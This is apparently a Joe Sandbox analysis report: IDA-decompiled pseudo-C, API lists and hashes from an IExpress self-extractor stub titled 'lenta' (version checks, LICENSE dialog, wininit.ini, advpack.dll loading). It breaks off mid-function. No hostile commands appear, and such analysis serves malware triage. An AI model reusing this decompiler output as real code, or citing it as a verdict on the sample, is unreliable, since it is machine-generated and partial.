                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: 1b2e177dfc46648ab25debad0b3072895ad7cbb3684bcdbbace55693aed4353d
                                                                      • Instruction ID: 47fcbf38f94c09d1f43a6f20ee429efa93d841d9e9950ddbc5989d89c6836a09
                                                                      • Opcode Fuzzy Hash: 1b2e177dfc46648ab25debad0b3072895ad7cbb3684bcdbbace55693aed4353d
                                                                      • Instruction Fuzzy Hash: 3721E775A05219BBDB2C9FA5DC459FF7B7CFF44714B010229EA16A3201DB359942CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D681F(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v20;
                                                                      				struct _OSVERSIONINFOA _v168;
                                                                      				void* _v172;
                                                                      				int* _v176;
                                                                      				int _v180;
                                                                      				int _v184;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				long _t31;
                                                                      				signed int _t35;
                                                                      				void* _t36;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t44;
                                                                      
                                                                      				_t36 = __ebx;
                                                                      				_t19 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t19 ^ _t44;
                                                                      				_t41 =  *0x11d81d8; // 0xfffffffe
                                                                      				_t43 = 0;
                                                                      				_v180 = 0xc;
                                                                      				_v176 = 0;
                                                                      				if(_t41 == 0xfffffffe) {
                                                                      					 *0x11d81d8 = 0;
                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                      						L12:
                                                                      						_t41 =  *0x11d81d8; // 0xfffffffe
                                                                      					} else {
                                                                      						_t41 = 1;
                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t31 = RegQueryValueExA(_v172, 0x11d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                      							_t43 = _t31;
                                                                      							RegCloseKey(_v172);
                                                                      							if(_t31 != 0) {
                                                                      								goto L12;
                                                                      							} else {
                                                                      								_t40 =  &_v176;
                                                                      								if(E011D66F9( &_v20,  &_v176) == 0) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									_t35 = _v176 & 0x000003ff;
                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                      										 *0x11d81d8 = _t41;
                                                                      									} else {
                                                                      										goto L12;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                      			}



















                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 011D686E
                                                                      • GetSystemMetrics.USER32(0000004A), ref: 011D68A7
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 011D68CC
                                                                      • RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,?,0000000C), ref: 011D68F4
                                                                      • RegCloseKey.ADVAPI32(?), ref: 011D6902
                                                                        • Part of subcall function 011D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,011D691A), ref: 011D6741
                                                                      Strings
                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 011D68C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 35e118af548d055cfa9f59e99782adb73938f5888ea292ca3f414a05bfb537e8
                                                                      • Instruction ID: 67d3cb4a5908bef38395e558efa1c24a3eb5ab249b05192c595c6b09b382b098
                                                                      • Opcode Fuzzy Hash: 35e118af548d055cfa9f59e99782adb73938f5888ea292ca3f414a05bfb537e8
                                                                      • Instruction Fuzzy Hash: F6319131A02228DFDB39DF69DC44BEAB7B8EF45668F0401A5E95DA3140E7309A85CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3A3F(void* __eflags) {
                                                                      				void* _t3;
                                                                      				void* _t9;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t16 = "LICENSE";
                                                                      				_t1 = E011D468F(_t16, 0, 0) + 1; // 0x1
                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                      				 *0x11d8d4c = _t3;
                                                                      				if(_t3 != 0) {
                                                                      					_t19 = _t16;
                                                                      					if(E011D468F(_t16, _t3, _t28) != 0) {
                                                                      						if(lstrcmpA( *0x11d8d4c, "<None>") == 0) {
                                                                      							LocalFree( *0x11d8d4c);
                                                                      							L9:
                                                                      							 *0x11d9124 = 0;
                                                                      							return 1;
                                                                      						}
                                                                      						_t9 = E011D6517(_t19, 0x7d1, 0, E011D3100, 0, 0);
                                                                      						LocalFree( *0x11d8d4c);
                                                                      						if(_t9 != 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						 *0x11d9124 = 0x800704c7;
                                                                      						L2:
                                                                      						return 0;
                                                                      					}
                                                                      					E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree( *0x11d8d4c);
                                                                      					 *0x11d9124 = 0x80070714;
                                                                      					goto L2;
                                                                      				}
                                                                      				E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0x11d9124 = E011D6285();
                                                                      				goto L2;
                                                                      			}







                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F64,?,00000002,00000000), ref: 011D3A5D
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 011D3AB3
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 011D3AD0
                                                                      • LocalFree.KERNEL32 ref: 011D3B13
                                                                        • Part of subcall function 011D6517: FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                        • Part of subcall function 011D6517: LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                        • Part of subcall function 011D6517: DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                        • Part of subcall function 011D6517: FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      • LocalFree.KERNEL32(00000000,011D3100,00000000,00000000), ref: 011D3AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 6d8f9df35e19d1037d119190c48c7ddeefae79d8aa63994b45bc0849eeb12d10
                                                                      • Instruction ID: 7ad4b8d53a1dfed0eab8195584b0c4a05e875afb36d95a3088765295ebe726d0
                                                                      • Opcode Fuzzy Hash: 6d8f9df35e19d1037d119190c48c7ddeefae79d8aa63994b45bc0849eeb12d10
                                                                      • Instruction Fuzzy Hash: 7611D3B0703211BBD73CAF3AAC09E1B7AB9EFD5750B10413EF562D6588DB7988408762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D24E0(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t7;
                                                                      				void* _t20;
                                                                      				long _t26;
                                                                      				signed int _t27;
                                                                      
                                                                      				_t20 = __ebx;
                                                                      				_t7 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t7 ^ _t27;
                                                                      				_t25 = 0x104;
                                                                      				_t26 = 0;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					E011D658A( &_v268, 0x104, "wininit.ini");
                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                      					if(_t25 != 0xffffffff) {
                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                      						_lclose(_t25);
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                      			}












                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 011D2506
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 011D252C
                                                                      • _lopen.KERNEL32(?,00000040), ref: 011D253B
                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 011D254C
                                                                      • _lclose.KERNEL32(00000000), ref: 011D2555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: 229b2207e0cf06923fa300daea14eb2c29ba58e1809389a716789803ee764c20
                                                                      • Instruction ID: e6ad8168631f6e8f96fefcf1f43f9bf08fe371de870528c571eb8036568d2d2b
                                                                      • Opcode Fuzzy Hash: 229b2207e0cf06923fa300daea14eb2c29ba58e1809389a716789803ee764c20
                                                                      • Instruction Fuzzy Hash: D701923260212867D734DA69AC08EDB7B7CDF45750F400165FA59D3184DB749A81CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E011D36EE(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _OSVERSIONINFOA _v416;
                                                                      				signed int _v420;
                                                                      				signed int _v424;
                                                                      				CHAR* _v428;
                                                                      				CHAR* _v432;
                                                                      				signed int _v436;
                                                                      				CHAR* _v440;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t72;
                                                                      				CHAR* _t77;
                                                                      				CHAR* _t91;
                                                                      				CHAR* _t94;
                                                                      				int _t97;
                                                                      				CHAR* _t98;
                                                                      				signed char _t99;
                                                                      				CHAR* _t104;
                                                                      				signed short _t107;
                                                                      				signed int _t109;
                                                                      				short _t113;
                                                                      				void* _t114;
                                                                      				signed char _t115;
                                                                      				short _t119;
                                                                      				CHAR* _t123;
                                                                      				CHAR* _t124;
                                                                      				CHAR* _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t132;
                                                                      				CHAR* _t135;
                                                                      				CHAR* _t138;
                                                                      				signed int _t139;
                                                                      
                                                                      				_t72 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t72 ^ _t139;
                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                      				_t115 = __ecx;
                                                                      				_t135 = 0;
                                                                      				_v432 = __ecx;
                                                                      				_t138 = 0;
                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                      					_t133 = _v416.dwMajorVersion;
                                                                      					_t119 = 2;
                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                      					__eflags = _t77;
                                                                      					if(_t77 == 0) {
                                                                      						_t119 = 0;
                                                                      						__eflags = 1;
                                                                      						 *0x11d8184 = 1;
                                                                      						 *0x11d8180 = 1;
                                                                      						L13:
                                                                      						 *0x11d9a40 = _t119;
                                                                      						L14:
                                                                      						__eflags =  *0x11d8a34 - _t138; // 0x0
                                                                      						if(__eflags != 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						__eflags = _t115;
                                                                      						if(_t115 == 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						_v428 = _t135;
                                                                      						__eflags = _t119;
                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                      						_t11 =  &_v420;
                                                                      						 *_t11 = _v420 & _t138;
                                                                      						__eflags =  *_t11;
                                                                      						_v440 = _t115;
                                                                      						do {
                                                                      							_v424 = _t135 * 0x18;
                                                                      							_v436 = E011D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                      							_t91 = E011D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                      							_t123 = _v436;
                                                                      							_t133 = 0x54d;
                                                                      							__eflags = _t123;
                                                                      							if(_t123 < 0) {
                                                                      								L32:
                                                                      								__eflags = _v420 - 1;
                                                                      								if(_v420 == 1) {
                                                                      									_t138 = 0x54c;
                                                                      									L36:
                                                                      									__eflags = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										L40:
                                                                      										__eflags = _t138 - _t133;
                                                                      										if(_t138 == _t133) {
                                                                      											L30:
                                                                      											_v420 = _v420 & 0x00000000;
                                                                      											_t115 = 0;
                                                                      											_v436 = _v436 & 0x00000000;
                                                                      											__eflags = _t138 - _t133;
                                                                      											_t133 = _v432;
                                                                      											if(__eflags != 0) {
                                                                      												_t124 = _v440;
                                                                      											} else {
                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                      												_v420 =  &_v268;
                                                                      											}
                                                                      											__eflags = _t124;
                                                                      											if(_t124 == 0) {
                                                                      												_t135 = _v436;
                                                                      											} else {
                                                                      												_t99 = _t124[0x30];
                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                      												__eflags = _t99 & 0x00000001;
                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                      													asm("sbb ebx, ebx");
                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                      												} else {
                                                                      													_t115 = 0x104;
                                                                      												}
                                                                      											}
                                                                      											__eflags =  *0x11d8a38 & 0x00000001;
                                                                      											if(( *0x11d8a38 & 0x00000001) != 0) {
                                                                      												L64:
                                                                      												_push(0);
                                                                      												_push(0x30);
                                                                      												_push(_v420);
                                                                      												_push("lenta");
                                                                      												goto L65;
                                                                      											} else {
                                                                      												__eflags = _t135;
                                                                      												if(_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												__eflags =  *_t135;
                                                                      												if( *_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												MessageBeep(0);
                                                                      												_t94 = E011D681F(_t115);
                                                                      												__eflags = _t94;
                                                                      												if(_t94 == 0) {
                                                                      													L57:
                                                                      													0x180030 = 0x30;
                                                                      													L58:
                                                                      													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                      													__eflags = _t115 & 0x00000004;
                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                      														__eflags = _t115 & 0x00000001;
                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                      															goto L66;
                                                                      														}
                                                                      														__eflags = _t97 - 1;
                                                                      														L62:
                                                                      														if(__eflags == 0) {
                                                                      															_t138 = 0;
                                                                      														}
                                                                      														goto L66;
                                                                      													}
                                                                      													__eflags = _t97 - 6;
                                                                      													goto L62;
                                                                      												}
                                                                      												_t98 = E011D67C9(_t124, _t124);
                                                                      												__eflags = _t98;
                                                                      												if(_t98 == 0) {
                                                                      													goto L57;
                                                                      												}
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags = _t138 - 0x54c;
                                                                      										if(_t138 == 0x54c) {
                                                                      											goto L30;
                                                                      										}
                                                                      										__eflags = _t138;
                                                                      										if(_t138 == 0) {
                                                                      											goto L66;
                                                                      										}
                                                                      										_t135 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L44;
                                                                      									}
                                                                      									L37:
                                                                      									_t129 = _v432;
                                                                      									__eflags = _t129[0x7c];
                                                                      									if(_t129[0x7c] == 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t133 =  &_v268;
                                                                      									_t104 = E011D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                      									__eflags = _t104;
                                                                      									if(_t104 != 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t135 = _v428;
                                                                      									_t133 = 0x54d;
                                                                      									_t138 = 0x54d;
                                                                      									goto L40;
                                                                      								}
                                                                      								goto L33;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							if(_t91 > 0) {
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _t123;
                                                                      							if(_t123 != 0) {
                                                                      								__eflags = _t91;
                                                                      								if(_t91 != 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                      								L27:
                                                                      								if(__eflags <= 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								L28:
                                                                      								__eflags = _t135;
                                                                      								if(_t135 == 0) {
                                                                      									goto L33;
                                                                      								}
                                                                      								_t138 = 0x54c;
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							_t107 = _v416.dwBuildNumber;
                                                                      							if(_t91 != 0) {
                                                                      								_t131 = _v424;
                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                      									goto L37;
                                                                      								}
                                                                      								goto L28;
                                                                      							}
                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                      							_t109 = _v424;
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                      								goto L28;
                                                                      							}
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                      							goto L27;
                                                                      							L33:
                                                                      							_t135 =  &(_t135[1]);
                                                                      							_v428 = _t135;
                                                                      							_v420 = _t135;
                                                                      							__eflags = _t135 - 2;
                                                                      						} while (_t135 < 2);
                                                                      						goto L36;
                                                                      					}
                                                                      					__eflags = _t77 == 1;
                                                                      					if(_t77 == 1) {
                                                                      						 *0x11d9a40 = _t119;
                                                                      						 *0x11d8184 = 1;
                                                                      						 *0x11d8180 = 1;
                                                                      						__eflags = _t133 - 3;
                                                                      						if(_t133 > 3) {
                                                                      							__eflags = _t133 - 5;
                                                                      							if(_t133 < 5) {
                                                                      								goto L14;
                                                                      							}
                                                                      							_t113 = 3;
                                                                      							_t119 = _t113;
                                                                      							goto L13;
                                                                      						}
                                                                      						_t119 = 1;
                                                                      						_t114 = 3;
                                                                      						 *0x11d9a40 = 1;
                                                                      						__eflags = _t133 - _t114;
                                                                      						if(__eflags < 0) {
                                                                      							L9:
                                                                      							 *0x11d8184 = _t135;
                                                                      							 *0x11d8180 = _t135;
                                                                      							goto L14;
                                                                      						}
                                                                      						if(__eflags != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                      							goto L14;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t138 = 0x4ca;
                                                                      					goto L44;
                                                                      				} else {
                                                                      					_t138 = 0x4b4;
                                                                      					L44:
                                                                      					_push(_t135);
                                                                      					_push(0x10);
                                                                      					_push(_t135);
                                                                      					_push(_t135);
                                                                      					L65:
                                                                      					_t133 = _t138;
                                                                      					E011D44B9(0, _t138);
                                                                      					L66:
                                                                      					return E011D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                      				}
                                                                      			}






































                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 011D3723
                                                                      • MessageBeep.USER32(00000000), ref: 011D39C3
                                                                      • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 011D39F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Message$BeepVersion
                                                                      • String ID: 3$lenta
                                                                      • API String ID: 2519184315-4216304122
                                                                      • Opcode ID: 21bd32437bc162f3de14cabeb84241e920b05ba456f8c0dfc6cebee449ca9da8
                                                                      • Instruction ID: a844b60666d9946c60e3a7c18ae3db8c347781d7e9a0b6549882fdba3e923fb0
                                                                      • Opcode Fuzzy Hash: 21bd32437bc162f3de14cabeb84241e920b05ba456f8c0dfc6cebee449ca9da8
                                                                      • Instruction Fuzzy Hash: 1C91D5F1F222259FEB7D8A29CC81BAAB7B1FB45304F0601A9C969D7245D7748981CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E011D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				signed int _t9;
                                                                      				signed char _t14;
                                                                      				struct HINSTANCE__* _t15;
                                                                      				void* _t18;
                                                                      				CHAR* _t26;
                                                                      				void* _t27;
                                                                      				signed int _t28;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t18 = __ebx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t28;
                                                                      				_push(__ecx);
                                                                      				E011D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      				_t26 = "advpack.dll";
                                                                      				E011D658A( &_v268, 0x104, _t26);
                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                      					_t15 = LoadLibraryA(_t26);
                                                                      				} else {
                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                      				}
                                                                      				return E011D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                      			}














                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D64DF
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D64F9
                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 011D6502
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                      • API String ID: 438848745-258089097
                                                                      • Opcode ID: 13f1b8a6e6d4b158adee3d9f7d9dae4ab726783d113b5d41673e79ecd565acbb
                                                                      • Instruction ID: 3cf43d6199e27c2338b17f2e596358502279f5eea5c1199464b59056f01965b2
                                                                      • Opcode Fuzzy Hash: 13f1b8a6e6d4b158adee3d9f7d9dae4ab726783d113b5d41673e79ecd565acbb
                                                                      • Instruction Fuzzy Hash: 3A01D170A01108ABDB2CEB74EC48EEA7778EB60314F8001A9E595931C4DF709AC6CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                      				void* _v8;
                                                                      				char* _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				int _v28;
                                                                      				int _v32;
                                                                      				void* _v36;
                                                                      				int _v40;
                                                                      				void* _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				void* _t79;
                                                                      				void* _t83;
                                                                      				void* _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t99;
                                                                      				int _t101;
                                                                      				void* _t103;
                                                                      				void* _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_v12 = __edx;
                                                                      				_t99 = __ecx;
                                                                      				_t106 = 0;
                                                                      				_v16 = __ecx;
                                                                      				_t87 = 0;
                                                                      				_t103 = 0;
                                                                      				_v20 = 0;
                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                      					L19:
                                                                      					_t106 = 1;
                                                                      				} else {
                                                                      					_t62 = 0;
                                                                      					_v8 = 0;
                                                                      					while(1) {
                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
